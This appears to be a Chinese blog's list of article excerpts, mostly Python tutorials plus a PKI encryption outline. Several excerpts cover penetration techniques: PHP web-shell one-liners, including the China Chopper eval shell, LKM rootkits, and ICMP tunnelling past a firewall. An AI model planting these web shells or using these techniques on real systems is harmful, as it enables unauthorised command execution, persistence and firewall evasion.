摘要:
可变类型变量在函数默认值中的一坑,以后大家记得绕着走,话不多说,上代码! 可变类型变量列表测试: 此时大家可能觉得应该输出如下内容: 其实不然,实际情况如下: 那换另一个可变类型变量字典试下呢? 此时大家可能觉得应该输出如下内容: 其实不然,实际情况如下: 那么换成不可变类型变量会是怎样的呢?那么拿 阅读全文
摘要:
Rootkit有应用级、内核级和硬件级 用的比较多的是内核级别,比如基于linux LKM编写的rootkit rootkit可以理解为一个超级管理员的工具箱,这个工具箱通过调用系统LKM接口可以动态实现对内核功能的修改,从而实现相比普通后门程序的变态级功能,比如: 1、替换 > 可以将系统命令替换 阅读全文
摘要:
利用PKI体系解决私密文件传输中一系列问题的大体思路背景:现有A用户和B用户之间想加密传输一些秘密文件,通过什么样的技术可以确保A和B传输数据的安全性?方案:采用对称秘钥对数据进行加密传输(对称加密算法计算效率高,速度快)解决的问题:私密性算法:AES、3DES、DES等工作原理:A用户选择一种对称加密算法并与用户口令P(P的值假设为'user_passwd')对原始数据Data进行加密后生成加密... 阅读全文
摘要:
php经典一句话: <?php echo shell_exec($_GET['cmd']);?> 中国菜刀:官网:www.maicaidao.co原理:上传一句话(<?php @eval($_POST['我是密码']);?>)至服务器端,再用中国菜刀客户端(图形化界面)去连接服务器 webacoo( 阅读全文
摘要:
一、ICMP隧道 背景:已经通过某种手段拿到了园区网A主机的控制权,但是边界防火墙只放行该主机向外的ICMP流量,此时怎样才能让A主机和公网主机C建立TCP连接呢? 方案:将TCP包内容包裹在ICMP中进行传递 工具: ptunnel 工作原理:A主机通过周期性向渗透测试工程师发送ICMP请求以建立 阅读全文
摘要:
UDP: from socket import * import struct send_data = struct.pack('!H8sb5sb',1,'test.jpg',0,'octet',0) >利用pack可以规定发送的某个字符串占用几个字节(可以用于构造数据包头数据,比如数据包头规定某一 阅读全文
摘要:
垃圾回收机制(GC)(引用计数为主,隔代回收为辅): 1、引用计数机制引用计数解决不了循环引用问题,如: class A(): pass def abc(): while 1: c1 = A() c2 = B() c1.t = c2 c2.t = c1 del c1 del c2 abc() 附:引 阅读全文
摘要:
生成器(生成器的本质是保存了一套生成值的算法,每调用一次生成一个值): 目标:需要一个非常大的列表,里面有很多元素,还不想占用太大内存空间。 生成器组成方式一: 将生成式的列表改为元组即可。 x = [x for i in range(5)] > x = (x for in range(5)) 生成 阅读全文
摘要:
装饰器:在原本的程序基础上新加一些功能(比如判断余额、次数登记等)后伪装成原来的程序。 多层装饰器:def makeBole(fn): >此处是函数做装饰器,另外还可以用类做装饰器 def wrapped(): return "<b>" + fn() + "</b>" return wrappedd 阅读全文
摘要:
模块(一个py文件): 导入一个模块时会把这个模块从头到尾执行一遍。为了防止导入模块时执行模块中的执行语句可以在编写模块时候将执行语句写在"if __name__ == '__main__':",这样被别人当模块导入时因为不满足if条件执行语句就不会被执行了(__name__是模块自带的一个变量,当 阅读全文